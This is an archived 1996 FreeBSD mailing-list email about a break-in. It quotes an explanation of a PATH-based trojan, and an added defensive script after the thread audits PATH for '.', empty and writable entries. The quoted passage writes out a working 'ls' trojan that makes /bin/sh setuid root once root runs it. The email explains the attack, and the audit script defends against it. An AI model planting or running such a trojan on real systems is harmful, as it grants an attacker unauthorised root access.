From owner-freebsd-hackers Tue Jun 25 00:34:25 1996
Return-Path: owner-hackers
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA27208 for hackers-outgoing; Tue, 25 Jun 1996 00:34:25 -0700 (PDT)
Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA27200; Tue, 25 Jun 1996 00:34:23 -0700 (PDT)
Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA07004; Tue, 25 Jun 1996 00:34:00 -0700 (PDT)
Date: Tue, 25 Jun 1996 00:33:59 -0700 (PDT)
From: -Vince-
To: "Michael L. VanLoon -- HeadCandy.com"
cc: Mark Murray, hackers@freebsd.org, security@freebsd.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606250727.AAA24988@MindBender.HeadCandy.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-hackers@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Michael L. VanLoon -- HeadCandy.com wrote:

>
> >> 2) The Cracker made a trojan script somewhere (usually exploiting
> >> some admins (roots) who have "." in their path). This way he creates
> >> a script that when run as root will make him a suid program.
> >> after this he has you by tender bits.
>
> > Hmmm, doesn't everyone have . as their path since all . does is allow
> >someone to run stuff from the current directory...
>
> Assume root has "." in its path. Hacker puts this little script in
> his dir, maybe also in /tmp/; it's called "ls" (imagine the
> coincidence), and it's executable by all:
>
> #!/bin/sh
> chown root /bin/sh > /dev/null 2>&1
> chmod u+s,a+x /bin/sh > /dev/null 2>&1
> ls $*
>
> Then sits back and waits for the sysadmin to come along and type "ls"
> in one of those directories.
>
> Pop quiz: what is the result?

Never thought about that one....

Vince
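
A defender-side check for the condition discussed in this message, added here as an example and not part of the original thread: it scans a PATH string for ".", for empty entries (which the shell also resolves to the current directory), for relative entries, and for group- or world-writable directories such as /tmp. The function name `audit_path` and its output labels are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a PATH string for entries that let another local
# user plant a command, as in the "ls" script quoted in the message.
# audit_path and the EMPTY/DOT/RELATIVE/WRITABLE labels are hypothetical.

# audit_path PATHSTRING
# Prints one finding per risky entry, in PATH order; prints nothing if clean.
audit_path() {
    # Append ":" so a trailing empty entry survives the splitting below.
    ap_rest="$1:"
    while [ -n "$ap_rest" ]; do
        ap_entry=${ap_rest%%:*}   # text before the first ":"
        ap_rest=${ap_rest#*:}     # text after the first ":"
        case "$ap_entry" in
            "")
                # Leading, trailing or doubled ":" yields an empty entry,
                # which command lookup treats as the current directory.
                echo "EMPTY (current directory)" ;;
            .)
                echo "DOT (current directory)" ;;
            /*)
                # Absolute entry: read the mode string, following symlinks.
                ap_mode=$(ls -ldL "$ap_entry" 2>/dev/null) || ap_mode=""
                case "$ap_mode" in
                    # 6th char = group write, 9th char = other write.
                    d????w*|d???????w*)
                        echo "WRITABLE $ap_entry" ;;
                esac ;;
            *)
                # Anything else is resolved relative to the current directory.
                echo "RELATIVE $ap_entry" ;;
        esac
    done
    return 0
}

# Stand-alone use: audit the PATH of the invoking shell.
audit_path "${PATH-}"
```

Run it from root's own login shell (or pass root's PATH as the argument to `audit_path`) so the string checked is the one root's commands are actually looked up in.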